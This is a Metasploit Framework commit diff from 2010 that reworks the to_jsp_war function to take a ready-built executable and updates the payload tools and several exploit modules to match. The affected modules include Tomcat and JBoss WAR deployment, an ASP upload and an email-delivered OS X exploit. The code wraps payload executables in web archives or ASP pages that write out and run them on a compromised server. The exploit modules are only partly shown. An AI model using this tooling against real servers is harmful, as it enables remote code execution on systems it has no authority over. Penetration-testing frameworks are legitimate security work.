rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32

git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-09-20 15:59:46 +00:00
parent 2cd8b7d5e2
commit bd1eeb3722
10 changed files with 25 additions and 34 deletions

View File

@ -97,7 +97,8 @@ module Payload
plat = Msf::Module::PlatformList.transform(opts['Platform']) plat = Msf::Module::PlatformList.transform(opts['Platform'])
tmp_plat = plat.platforms tmp_plat = plat.platforms
buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe}) exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
else else
# Serialize the generated payload to some sort of format # Serialize the generated payload to some sort of format
buf = Buffer.transform(e.encoded, fmt) buf = Buffer.transform(e.encoded, fmt)

View File

@ -216,7 +216,8 @@ class Module < Base
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe}) output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
when 'war' when 'war'
tmp_plat = plat.platforms tmp_plat = plat.platforms
output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe}) exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
else else
fmt ||= "ruby" fmt ||= "ruby"
output = Msf::Simple::Buffer.transform(raw, fmt) output = Msf::Simple::Buffer.transform(raw, fmt)

View File

@ -813,9 +813,7 @@ require 'metasm'
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload. # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
# The jsp page converts the hexdump back to a normal .exe file and places it in # The jsp page converts the hexdump back to a normal .exe file and places it in
# the temp directory. The payload .exe file is then executed. # the temp directory. The payload .exe file is then executed.
def self.to_jsp_war(framework, arch, plat, code='', opts={}) def self.to_jsp_war(exe, opts={})
exe = to_executable(framework, arch, plat, code, opts)
# begin <payload>.jsp # begin <payload>.jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)

View File

@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
:jsp_name => jsp_name :jsp_name => jsp_name
}) })
else else
@war_data = Msf::Util::EXE.to_jsp_war(framework, exe = generate_payload_exe({ :code => p.encoded })
arch, plat, @war_data = Msf::Util::EXE.to_jsp_war(exe,
p.encoded,
{ {
:app_name => app_base, :app_name => app_base,
:jsp_name => jsp_name :jsp_name => jsp_name

View File

@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Using manually select target \"#{mytarget.name}\"") print_status("Using manually select target \"#{mytarget.name}\"")
end end
# set arch/platform from the target
arch = mytarget['Arch']
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
# Generate the WAR containing the EXE containing the payload # Generate the WAR containing the EXE containing the payload
jsp_name = rand_text_alphanumeric(4+rand(32-4)) jsp_name = rand_text_alphanumeric(4+rand(32-4))
war = Msf::Util::EXE.to_jsp_war(framework, exe = generate_payload_exe
arch, plat, war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
payload.encoded,
:jsp_name => jsp_name)
app_base = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4))
query_str = "?path=/" + app_base query_str = "?path=/" + app_base

View File

@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This module sends email messages via smtp # This module sends email messages via smtp
# #
include Msf::Exploit::Remote::SMTPDeliver include Msf::Exploit::Remote::SMTPDeliver
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (target.arch.include?(ARCH_CMD)) if (target.arch.include?(ARCH_CMD))
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n") cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
else else
bin = '' bin = generate_payload_exe
if(target.arch.index(ARCH_PPC))
bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
end
if(target.arch.index(ARCH_X86))
bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
end
cmd = Rex::Text.encode_base64(bin, "\r\n") cmd = Rex::Text.encode_base64(bin, "\r\n")
end end

View File

@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
arch = target['Arch']
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
# Generate the WAR containing the EXE containing the payload # Generate the WAR containing the EXE containing the payload
app_base = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4))
jsp_name = rand_text_alphanumeric(8+rand(8)) jsp_name = rand_text_alphanumeric(8+rand(8))
war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
exe = generate_payload_exe
war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
res = send_request_cgi( res = send_request_cgi(
{ {

View File

@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
# Generate the ASP containing the EXE containing the payload # Generate the ASP containing the EXE containing the payload
asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded) exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s) path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
path_tmp = path.gsub(/\....$/, ".txt") path_tmp = path.gsub(/\....$/, ".txt")

View File

@ -273,8 +273,11 @@ case cmd
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe}) asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
write_encoded(asp) write_encoded(asp)
when 'war' when 'war'
tmp_plat = plat.platforms arch ||= [ ARCH_X86 ]
war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe}) tmp_plat = plat.platforms if plat
tmp_plat ||= Msf::Module::PlatformList.transform('win')
exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
write_encoded(war) write_encoded(war)
else else
fmt ||= "ruby" fmt ||= "ruby"

View File

@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
arch = payload.arch arch = payload.arch
plat = payload.platform.platforms plat = payload.platform.platforms
exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf) exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
exe = Msf::Util::EXE.to_jsp_war(exe)
if(exe) if(exe)